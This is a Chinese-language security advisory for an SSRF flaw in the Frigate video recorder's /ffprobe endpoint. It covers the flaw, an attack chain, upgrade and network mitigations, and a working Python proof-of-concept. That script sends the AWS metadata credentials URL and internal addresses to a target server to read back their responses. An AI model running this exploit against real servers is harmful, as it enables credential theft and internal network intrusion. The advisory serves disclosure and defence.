CVE-2026-33126 Frigate SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-33126

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Frigate

漏洞概述

Frigate是一款配备实时本地对象检测功能的网络视频录像机（NVR）。在0.16.3版本之前，其/ffprobe端点存在服务器端请求伪造（SSRF）安全漏洞。该端点在处理用户请求时，未对传入的URL进行适当的验证，导致攻击者可利用Frigate服务器向内部网络资源、云元数据服务发起HTTP请求或执行端口扫描。目前该问题已在0.16.3版本中得到修复。

技术细节

该漏洞的根源在于Frigate应用程序的/ffprobe接口缺乏对用户输入URL的有效校验机制。ffprobe通常用于分析多媒体流，但在此版本中，它直接将用户提交的URL作为探测目标。攻击者只需发送一个包含恶意URL的请求至该端点，即可诱导服务器向后端发起请求。由于请求源自受信任的服务器内部，它能够轻易绕过针对外部攻击的网络边界防火墙。攻击者利用此漏洞，可以探测内网主机的存活状态、开放端口，甚至访问云服务提供商的元数据API（如169.254.169.254），从而获取临时的访问凭证。尽管CVSS向量显示机密性影响为无，但在特定配置下，这可能导致严重的数据泄露或内网横向移动风险。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在运行Frigate NVR服务，并确定其版本低于0.16.3。

STEP 2

2. 构造恶意请求

攻击者构造包含恶意URL（如内网IP地址或云元数据服务地址）的HTTP POST请求，目标指向Frigate的/ffprobe端点。

STEP 3

3. 服务端请求伪造

Frigate服务器接收到请求后，未经验证即使用ffprobe工具向攻击者指定的内部URL发起HTTP连接。

STEP 4

4. 获取敏感信息

根据内部服务的响应，攻击者获取到端口状态、服务信息或云实例凭证，为进一步的内网渗透奠定基础。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_ssrf(target_url, internal_url):
    """
    Proof of Concept for CVE-2026-33126
    Tests if the target Frigate server is vulnerable to SSRF via /ffprobe endpoint.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/ffprobe"
    
    # Payload containing the internal URL to access
    # Example: AWS Metadata service or an internal admin panel
    payload = {
        "url": internal_url
    }

    try:
        print(f"[*] Sending request to {endpoint} with payload: {internal_url}")
        response = requests.post(endpoint, data=payload, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response Content:")
        print(response.text)
        
        if response.status_code == 200 and "169.254" in response.text:
            print("[!] Potential SSRF vulnerability confirmed: Metadata service accessed.")
        elif response.status_code == 200:
            print("[!] Request processed, check output for internal data.")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target Frigate server URL
    target = "http://localhost:5000"
    
    # Common internal targets to test
    test_urls = [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/", # AWS Metadata
        "http://127.0.0.1:80", # Localhost
        "http://192.168.1.1"   # Router/Gateway
    ]
    
    for url in test_urls:
        check_ssrf(target, url)
        print("-" * 40)

影响范围

Frigate < 0.16.3

防御指南

临时缓解措施

建议立即升级Frigate至0.16.3或更高版本以彻底修复此漏洞。如果暂时无法升级，应通过网络ACL或安全组限制Frigate服务器的出站访问权限，禁止其访问非必要的内网段和公网地址。同时，建议在反向代理层面（如Nginx）拦截对/ffprobe接口的外部请求，或仅允许受信任的IP地址访问。